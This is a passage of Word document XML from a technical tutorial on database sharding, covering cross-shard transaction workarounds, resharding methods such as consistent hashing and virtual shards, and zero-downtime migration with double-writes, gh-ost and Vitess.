    <w:p w14:paraId="35A8E0A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>No atomicity guarantee (intermediate states are visible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE2667" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Compensating transactions must be idempotent (safe to retry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD413CF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Complex failure handling (what if compensation fails?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208D698" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1561"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Some operations aren't easily compensatable (sending an email, physical shipment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581D82B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution 3: Avoid cross-shard transactions by design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2CD6A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76330679" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Co-locate: If A and B are on the same shard → local transaction (no distributed coordination).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C5974" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0950769C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Design principle: Choose shard key so that entities that transact together are on the same shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE2EC60" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="12931770" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Example: All accounts for the same bank branch on same shard → intra-branch transfers are local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6E134" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cross-branch transfers: use async messaging (eventual consistency acceptable for non-instant transfers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A669A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="307FCEE0">
          <v:rect id="_x0000_i5762" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAEEC33" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Resharding — When Shards Need to Change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A83A98" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Why Resharding Is Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC996E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F70459" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Initial design: 4 shards, each handles 25% of data and traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176EC00C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0ECA4D8D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2 years later:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020DCEC0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Data grew 10x → shards are full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C15BE3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Traffic grew 5x → shards are overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEFFE4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - One shard has 60% of traffic (hot customer segment grew).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB91F0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A824D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Need: More shards, rebalanced data distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE57CD7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 The Resharding Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F33F23" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With hash(key) % N:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CA054B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3639F772" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Before: 4 shards.  hash(key) % 4 = placement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6AB26" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>After:  8 shards.  hash(key) % 8 = placement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E70CFBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="18DE2D9A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Key 12345: hash(12345) % 4 = 1 → Shard 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88194E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Key 12345: hash(12345) % 8 = 5 → Shard 5 (MOVED!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663F8D31" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2F18720F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>~75% of all keys change shards → must migrate 75% of all data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DC7A72" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>During migration: system must handle reads/writes to data that's "in transit."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40524ED1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Resharding Approaches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A674E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Consistent hashing (minimizes movement):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDEA41E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044AFE93" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Adding one node to a ring of N nodes: ~1/N of keys move (not 75%+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1501A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  4 nodes: add 1 → ~25% of keys move (from one adjacent node).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEC481E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Practical: much less disruptive than modulo-based resharding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F977D70" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Virtual shards (logical sharding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B42A06" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BCF73B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Physical nodes: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47655E1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Virtual shards: 256 (each physical node hosts 64 virtual shards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8438C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="01A41081" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Resharding = Moving virtual shards between physical nodes (not remapping keys).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E19D2A6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0FB2DD1C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Add physical node 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD93FFE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Move 51 virtual shards from nodes 1–4 to node 5 (roughly even).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3878DA0A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Keys don't change their virtual shard assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F517CDD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Only physical location changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442FEBD9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D77BB32" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>This is what DynamoDB, CockroachDB, and Vitess do internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555656C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Split/merge (range-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6820CE9A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA2D937" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard A holds range [1–1000000] and is too large.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B73E2B3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Split into:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCF76C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard A: [1–500000]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3CB097" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard A': [500001–1000000]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F8034" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="30F5FB5F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>No data remapping — just splitting at a boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B932FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Each resulting shard handles half the data/traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E61F0D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Online Resharding (Zero-Downtime Migration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05421B54" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> Move data between shards while the system continues serving reads and writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F24AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Double-write approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CF05C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261D3940" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 1: Start writing to BOTH old shard and new shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A0831" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 2: Background migration copies existing data from old shard to new shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498925A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 3: Verify new shard has all data (checksums, counts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D75658F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 4: Switch reads to new shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5F126" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Phase 5: Stop writing to old shard. Remove old shard mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C0FC3F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ghost table approach (used by gh-ost for MySQL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99D4A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717EF2DC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>1. Create new shard/table structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37E1FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2. Set up triggers/CDC to capture all changes on old shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E4F7A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>3. Background copy: bulk copy existing data to new shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFCC416" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>4. Apply captured changes (replay changes that happened during copy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFB6FB6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>5. When caught up: brief lock, swap routing, release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F96C4A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>6. Cleanup old shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC1E2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vitess (YouTube's sharding middleware) resharding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DEDFF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78430056" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>1. Set up VReplication streams from source shard(s) to target shard(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D70DBE1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2. Streams copy existing data + replicate ongoing changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB00B4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>3. When target is caught up: "SwitchReads" (reads go to target).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE442A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>4. Verify for a period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1979EC22" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>5. "SwitchWrites" (writes go to target, brief write pause ~1 second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756484E7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>6. Cleanup source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4B86BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="32303A8C">
          <v:rect id="_x0000_i5763" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C94AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Sharding Architectures — Where Routing Logic Lives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E602AB5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Application-Level Sharding (Client-Aware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A531947" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD8320" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189C1D4C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│    Application      │  ← Application knows sharding logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381CA8B4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  (shard-aware code) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80DA4B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───</w:t>
      </w:r>
